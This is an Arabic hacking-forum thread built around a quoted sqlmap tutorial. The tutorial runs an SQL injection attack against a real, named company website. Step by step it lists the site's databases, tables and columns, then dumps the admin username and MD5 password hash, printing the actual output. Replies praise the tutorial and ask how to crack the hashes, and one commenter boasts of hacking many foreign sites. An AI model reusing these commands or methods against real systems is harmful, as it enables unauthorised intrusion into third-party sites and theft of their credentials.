المشاركة الأصلية كتبت بواسطة Mad Devil مشكورررر يالغالي والله ماقصرت ويا portgas~D~Ace ممكن الفيديو لو سمحت يعني عيوووووووووووووني اخي
Iam BACK PEOPLE Ace 2010-2017
شرح روعة أخي بارك الله فيك استمر مع حصرياتك
المشاركة الأصلية كتبت بواسطة Hidden pain شرح روعة أخي بارك الله فيك استمر مع حصرياتك مشكور اخي وانا يشرفني مرورك على الموضوع
شكرا لتعليمي ولكن كيف فك تشفير كلمة المرور (md5) الرجاء
نعم كيف يتم فك التشفيررررررررر انا اخترقت كثير مواقع اجنبية ولاكن المشكلة في فك التشفيررررررررر الي يعرف يقول ؟؟؟؟؟؟؟؟ ومشكورررررررررر على الشرح المبدع
مشكووووووووور بارك الله فيك
اللهم انت ربي ... لا اله الا انت خلقتني.. وانا عبدك وانا على عهدك.. و وعدك ما استطعت اعوذ بك من شر ما صنعت.. ابوء لك بنعمتك علي .. وابوء لك بذنبي.. فاغفرلي يا رب.. فأنه لا يغفر الذنوب الا انت.
مبدع مشاء الله الله يجعلنا من المستفيدين منك و مشكور اخي على المجهود
المشاركة الأصلية كتبت بواسطة r00t-minat0r بسم الله الرحمن الرحيم السلام عليكم ورحمة الله وبركاته الكل يعرف انه ثغرات sql من اقوى واكثر الثغرات انتشارا واحيانا تاخذ وقت في عملية الأستهداف ولاكن الان تستطيع استهداف المواقع المصابة بكل سرعة ممكنة باستخدام اداة في الباك تراك اسم الأداة :sqlmap مسار الاداة : /pentest/database/sqlmap لغة البرمجة : python الأن كيفية استخدام الاداة في عملية الحقن اولا : استخراج اسماء قواعد البيانات لنقل ان هذا الموقع مصاب بثغرة sql كود: http://www.bcspeakers.com/page.php?id=22 وكلنا نعرف كيفية الفحص وهي باضافة ' الى نهاية الرابط واذا وجد خطأ كان الموقع مصاب الأن الأمر المستخدم في استخراج القواعد لهذا الموقع كود: python sqlmap.py -u http://www.bcspeakers.com/page.php?id=22 --dbs النتيجة كود: available databases [2]: [*] information_schema [*] www-bcspeakerstest مثل ما شفتو تم استخراج القواعد والان القاعدة المستهدفة هي " www-bcspeakerstest" ثانيا : استخراج الجداول القاعدة المستهدفة هي " www-bcspeakerstest" سوف يكون الأمر بهذا الشكل كود: python sqlmap.py -u http://www.bcspeakers.com/page.php?id=22 -D www-bcspeakerstest --tables والنتيجة كبيرة لن اضعها لانها تتكون من 59 جدول على كل حال انا وجدت الجدول المستهدف وهو "_user" ثالثا : استخراج الأعمدة الان نأتي الى استخراج الأعمدة الموجودة في جدول "_user" الكود كالتالي كود: python sqlmap.py -u http://www.bcspeakers.com/page.php?id=22 -D www-bcspeakerstest -T _user --columns والنتيجة كالتالي كود: +----------+---------------------------+ | Column | Type | +----------+---------------------------+ | id_user | int(10) unsigned zerofill | | password | text | | username | text | +----------+---------------------------+ كما ترون الأعمدة المستهدفة هي password username رابعا : اسخراج البيانات من الاعمدة العمود الاول هو عامود اسم المستخدم "username" سوف يكون الكود كالتالي كود: python sqlmap.py -u http://www.bcspeakers.com/page.php?id=22 -D www-bcspeakerstest -T _user -C username --dump النتيجة كود: +--------------+ | username | +--------------+ | becspeak2803 | | becspeak2803 | +--------------+ كما ترون استخرجنا اسم المستخدم والان نأتي الى استخراج الباسورود اكود مثل السابق مع تغيير اسم العامود الى عامود الباسوورد كود: python sqlmap.py -u http://www.bcspeakers.com/page.php?id=22 -D www-bcspeakerstest -T _user -C password --dump سوف تسألك الأداة اذا كنت تريد محاولة مقارنة الهاش مع قاعدة البيانات المرفقة باالأداة كود: recognized possible password hash values. do you want to use dictionary attack on retrieved table items? [Y/n/q] تختار مثل ما نت عاوز انا اخترت لا لتسريع العملية والنتيجة كالتالي كود: +----------------------------------+ | password | +----------------------------------+ | 286adae502ad9d5ab8c4f8644050b448 | | 286adae502ad9d5ab8c4f8644050b448 | +----------------------------------+ كما ترون تم استخراج البيانات بسرعة كبيرة اتمنى ان يعجبكم الشرح وأي استفسار انا جاهز والسلام عليكم ورحمة الله وبركاته لو كان شرحا عبر فيديو لكان روعة أخي فيديو من فضلك
http://www.bcspeakers.com/page.php?id=22
python sqlmap.py -u http://www.bcspeakers.com/page.php?id=22 --dbs
available databases [2]: [*] information_schema [*] www-bcspeakerstest
python sqlmap.py -u http://www.bcspeakers.com/page.php?id=22 -D www-bcspeakerstest --tables
python sqlmap.py -u http://www.bcspeakers.com/page.php?id=22 -D www-bcspeakerstest -T _user --columns
+----------+---------------------------+ | Column | Type | +----------+---------------------------+ | id_user | int(10) unsigned zerofill | | password | text | | username | text | +----------+---------------------------+
python sqlmap.py -u http://www.bcspeakers.com/page.php?id=22 -D www-bcspeakerstest -T _user -C username --dump
+--------------+ | username | +--------------+ | becspeak2803 | | becspeak2803 | +--------------+
python sqlmap.py -u http://www.bcspeakers.com/page.php?id=22 -D www-bcspeakerstest -T _user -C password --dump
recognized possible password hash values. do you want to use dictionary attack on retrieved table items? [Y/n/q]
+----------------------------------+ | password | +----------------------------------+ | 286adae502ad9d5ab8c4f8644050b448 | | 286adae502ad9d5ab8c4f8644050b448 | +----------------------------------+
[email protected] القافلة تسير و الكلاب تنبح الموسم الثاني هه لمتابعتي في YouTube و FaceBook و Zone-H
مشكور على الموضوع اخوي
رافو احلى تقيم
<a href="http://www.wieistmeineip.de/cometo/?de"><img src="http://www.wieistmeineip.de/ip-adresse/?size=468x60" border="0" width="468" height="60" alt="IP" /></a>
عرض سحابة الكلمة الدلالية
قوانين المنتدى